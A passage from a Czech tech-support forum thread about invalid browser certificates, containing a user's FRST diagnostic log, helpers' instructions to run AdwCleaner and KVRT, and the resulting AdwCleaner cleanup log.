Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Nástroj pro odesílání služby Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Trend Micro Internet Security (HKLM\...\{718D791F-F4E8-4aa7-98A6-15FDED17BDD0}) (Version: 17.50 - Trend Micro Inc.)
Trend Micro Internet Security (HKLM\...\{9D2B0322-44AE-460E-9283-4D2D7A9205AE}) (Version: 17.50 - Trend Micro Inc.) Hidden
USB 2.0 1.3M UVC WebCam (HKLM\...\USB 2.0 1.3M UVC WebCam) (Version: - )
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{4B4451CE-D1E6-4BDE-B4B2-59F03BB83B7C}) (Version: 14.0.8050.1202 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.26.0 - ASUS)
WinRAR 6.02 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{20FDF948-C8ED-4543-A539-F7F4AEF5AFA2}) (Version: 3.0.10 - ASUS)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{041F9391-C79D-44EE-AA4E-AF4E029C4B47}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\PC\AppData\Local\Google\Chrome\Application\94.0.4606.81\notification_helper.exe (Google LLC -> Google LLC) [File not signed]
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-07-03] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2008-10-01 08:02 - 2008-10-01 08:08 - 000011264 _____ () [File not signed] C:\Program Files (x86)\ASUS\Splendid\GLCDdll.dll
2009-10-06 11:31 - 2009-05-07 10:53 - 000379392 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2009-10-06 11:31 - 2009-05-07 10:51 - 000071680 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2009-10-06 11:31 - 2009-07-06 08:37 - 047601664 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2009-10-06 11:31 - 2008-01-18 08:49 - 000098816 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2009-10-06 11:31 - 2007-03-10 03:58 - 000124416 _____ () [File not signed] C:\Program Files\ATKGFNEX\AGFNEX64.dll
2009-05-05 19:00 - 2009-05-05 19:00 - 000041472 _____ () [File not signed] C:\Program Files\P4G\DevMng.dll
2009-07-27 19:12 - 2009-07-27 19:12 - 000026624 _____ () [File not signed] C:\Program Files\P4G\OvrClk.dll
2009-10-06 11:33 - 2009-06-22 22:37 - 000212992 _____ () [File not signed] C:\Windows\SysWOW64\Fast Boot\GetBootTime.dll
2004-05-28 03:13 - 2004-05-28 03:13 - 000080384 _____ (ACTIONTEC Electronics,Inc) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\ATKWLIOC.DLL
2008-06-10 19:35 - 2008-06-10 19:35 - 000049152 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\ATKMETHOD.dll
2005-04-08 06:38 - 2009-07-10 00:43 - 000052736 _____ (ASUSTeK) [File not signed] C:\Program Files (x86)\ASUS\Splendid\Chameleon.dll
2005-06-03 10:39 - 2006-09-12 01:46 - 000035840 _____ (ASUSTek) [File not signed] C:\Program Files (x86)\ASUS\Splendid\OVS.dll
2005-09-22 02:30 - 2005-09-22 02:30 - 000036864 _____ (ATK) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\inter_f2.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 000442712 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\libegl.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 007866200 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\libglesv2.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 004401496 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\vk_swiftshader.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 000733016 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\vulkan-1.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 176138584 _____ (Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\chrome.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 001187672 _____ (Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\chrome_elf.dll
2021-10-25 16:56 - 2021-10-16 03:20 - 004891080 _____ (Microsoft Corporation -> Microsoft Corporation) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\D3DCompiler_47.dll
2009-08-22 11:02 - 2009-08-22 11:02 - 001652736 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Trend Micro\Internet Security\MFC80U.DLL
2005-01-13 09:36 - 2005-01-13 09:36 - 000303104 _____ (Silicon Integrated Systems Corp.) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\SiSPkt.dll
2021-07-05 14:22 - 2021-06-11 11:17 - 000571544 _____ (win.rar GmbH -> Alexander Roshal) [File not signed] C:\Program Files\WinRAR\rarext.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 8) (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//asus.msn.com
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Pomocník pro přihlášení ke službě Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2008-11-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM-x32 - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 78.157.167.7 - 78.157.167.57
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AD1925B9-10F2-4E15-B702-45B687BF9C5D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DDC37A15-CF76-4EE2-AC69-8F450DF3E551}] => (Allow) C:\Windows\system32\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3529A-4DCD-488F-9D52-F549C33A7685}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{A5FEFD13-E490-4420-B2FF-C2591F4D06D4}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{6FAEB1BD-6225-4CA1-88A1-35422AEFDB14}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [TCP Query User{EA50643B-3BA1-42C9-8A94-29A298B813B1}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{4DD63112-DB4B-45D6-B2A8-E15EB604C55D}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [{1E472D29-7705-4C3D-846D-190DB4FA8F87}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) [File not signed]

==================== Restore Points =========================

03-01-2021 19:32:13 Nainstalováno rozhraní DirectX
03-01-2021 19:42:38 Windows Update
05-07-2021 13:55:40 Removed 2007 Microsoft Office system
05-07-2021 14:30:59 Installed Microsoft Office Enterprise 2007

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/26/2021 04:52:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: FRST64.exe, verze: 20.10.2021.0, časové razítko: 0x61703b27
Název chybujícího modulu: FRST64.exe, verze: 20.10.2021.0, časové razítko: 0x61703b27
Kód výjimky: 0xc0000005
Posun chyby: 0x000000000002687a
ID chybujícího procesu: 0x175c
Čas spuštění chybující aplikace: 0x01d7ca7863a1dab1
Cesta k chybující aplikaci: C:\Users\PC\Desktop\FRST64.exe
Cesta k chybujícímu modulu: C:\Users\PC\Desktop\FRST64.exe
ID zprávy: 50bf50ce-366c-11ec-91ac-90e6ba63844b

Error: (10/26/2021 04:42:35 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:33 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.


System errors:
=============
Error: (10/26/2021 05:02:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} se v daném časovém limitu neregistroval u služby DCOM.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:48 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:38:42 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 40.


==================== Memory info ===========================

BIOS: American Megatrends Inc. 212 08/26/2009
Motherboard: ASUSTeK Computer Inc. K50IJ
Processor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentage of memory in use: 85%
Total physical RAM: 4061.09 MB
Available physical RAM: 587.36 MB
Total Virtual: 8120.32 MB
Available Virtual: 788.01 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:149.05 GB) (Free:110.63 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:134.39 GB) (Free:65.13 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Not Active) - (Size=14.6 GB) - (Type=1C)
Partition 2: (Active) - (Size=149 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=134.4 GB) - (Type=0F Extended)

==================== End of Addition.txt =======================

Re: neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 16:51
od Rudy
Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi

Re: neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 16:53
od JaRon
Ahoj
stiahni Avptool Kvrt -restartuj do nudzoveho rezimu PC a vycisti s Kvrt pocitac

Re: neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 17:01
od Eddydye
# -------------------------------
# Malwarebytes AdwCleaner 8.3.0.0
# -------------------------------
# Build: 06-29-2021
# Database: 2021-10-26.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 10-26-2021
# Duration: 00:00:15
# OS: Windows 7 Home Premium
# Cleaned: 33
# Failed: 0


***** [ Services ] *****

Deleted Main Service

***** [ Folders ] *****

Deleted C:\Program Files (x86)\MachinerData

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Toolbar|{21FA44EF-376D-4D53-9B0F-8A89D3229068}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted Preinstalled.ASUSControlDeck Folder C:\Program Files (x86)\ASUS\CONTROLDECK
Deleted Preinstalled.ASUSControlDeck Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{169201BA-EF95-4DBA-A040-93D29590C6AF}
Deleted Preinstalled.ASUSControlDeck Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASUSControlDeck
Deleted Preinstalled.ASUSControlDeck Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{5B65EF64-1DFA-414A-8C94-7BB726158E21}
Deleted Preinstalled.ASUSControlDeck Task C:\Windows\System32\Tasks\ASUSCONTROLDECK
Deleted Preinstalled.ASUSFancyStart Folder C:\ASUS.DAT
Deleted Preinstalled.ASUSFancyStart Folder C:\Program Files (x86)\ASUS\FANCYSTART
Deleted Preinstalled.ASUSLiveUpdate Folder C:\Program Files (x86)\ASUS\ASUS LIVE UPDATE
Deleted Preinstalled.ASUSLiveUpdate Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C02341A7-0F42-4050-B91B-7BBE20935F36}
Deleted Preinstalled.ASUSLiveUpdate Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASUS Live Update
Deleted Preinstalled.ASUSLiveUpdate Task C:\Windows\System32\Tasks\ASUS LIVE UPDATE
Deleted Preinstalled.ASUSSplendid Folder C:\Program Files (x86)\ASUS\SPLENDID
Deleted Preinstalled.ASUSSplendid Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9EA161CC-94DA-40D4-AD7B-00389FB1DC3C}
Deleted Preinstalled.ASUSSplendid Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ACMON
Deleted Preinstalled.ASUSSplendid Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{0969AF05-4FF6-4C00-9406-43599238DE0D}
Deleted Preinstalled.ASUSSplendid Task C:\Windows\System32\Tasks\ACMON
Deleted Preinstalled.ASUSVirtualCamera Folder C:\Program Files (x86)\ASUS\VIRTUALCAMERA
Deleted Preinstalled.ASUSVirtualCamera Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}
Deleted Preinstalled.CyberLinkLabelPrint Folder C:\Program Files (x86)\CYBERLINK\LABELPRINT
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateLBPShortCut
